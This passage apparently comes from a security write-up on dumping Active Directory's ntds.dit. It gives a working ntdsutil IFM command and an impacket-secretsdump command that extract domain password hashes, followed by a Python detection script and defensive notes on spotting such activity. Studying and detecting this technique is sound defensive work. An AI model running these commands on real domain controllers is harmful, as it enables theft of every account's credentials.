Dumping the required files to c:\temp using a native Windows binary, ntdsutil.exe:
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
We can see that ntds.dit, along with the SYSTEM and SECURITY registry hives, is being dumped to c:\temp:
We can then dump password hashes:
[email protected]~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local
On the victim machine, no surprises:
Monitoring command-line arguments is, as usual, a good idea, as it can reveal attempts to dump ntds.dit:
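As an added illustration (not part of the original write-up), the following Python triage logic runs over a few constructed process-creation records shaped like Sysmon Event ID 1 / Security 4688 fields and flags command lines that drive ntdsutil's IFM "create full" snapshot, regardless of whether the commands are quoted with single or double quotes, abbreviated ("ac i ntds") or spelled out ("activate instance ntds"), or wrapped in powershell. The sample events and the function names are assumptions for this example.

```python
import re

# Constructed sample process-creation events (not real telemetry); field names
# mirror Sysmon Event ID 1 / Security 4688 so the logic maps onto real logs.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": 'ntdsutil.exe "ac i ntds" "ifm" "create full c:\\temp" q q'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\\temp' q q\""},
    {"Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": 'ntdsutil "activate instance ntds" "ifm" "create sysvol full c:\\backup" quit quit'},
    # ntdsutil used for routine database maintenance, not an IFM snapshot
    {"Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": 'ntdsutil "ac i ntds" "files" "info" q q'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe c:\\temp\\notes.txt"},
]


def normalize(cmdline: str) -> str:
    """Lowercase, drop both quote styles and collapse whitespace so that
    "ac i ntds" and 'ac i ntds' compare equal."""
    stripped = cmdline.replace('"', " ").replace("'", " ")
    return re.sub(r"\s+", " ", stripped).strip().lower()


def is_ntds_ifm_dump(event: dict) -> bool:
    """True when the command line invokes ntdsutil's ifm menu with a
    'create ... full' snapshot, the combination that writes ntds.dit plus
    the SYSTEM/SECURITY hives to disk."""
    cmd = normalize(event.get("CommandLine", ""))
    if "ntdsutil" not in cmd:
        return False
    # ntdsutil accepts abbreviated menu commands, so match the menu keyword
    # and the create/full pair rather than one fixed string.
    in_ifm_menu = " ifm " in f" {cmd} "
    creates_full = re.search(r"\bcreate\b.*\bfull\b", cmd) is not None
    return in_ifm_menu and creates_full


def triage(events):
    """Return the command lines worth an analyst's attention."""
    return [e["CommandLine"] for e in events if is_ntds_ifm_dump(e)]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("ntdsutil IFM snapshot:", hit)
```

In production, pair this with the parent process and the user context (a scheduled, known backup job on a DC looks different from an interactive session), because ntdsutil IFM snapshots are also a legitimate way to stage media for promoting a new domain controller.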
Additionally, there are multiple Application log events that can indicate activity around ntds.dit which you may want to investigate further: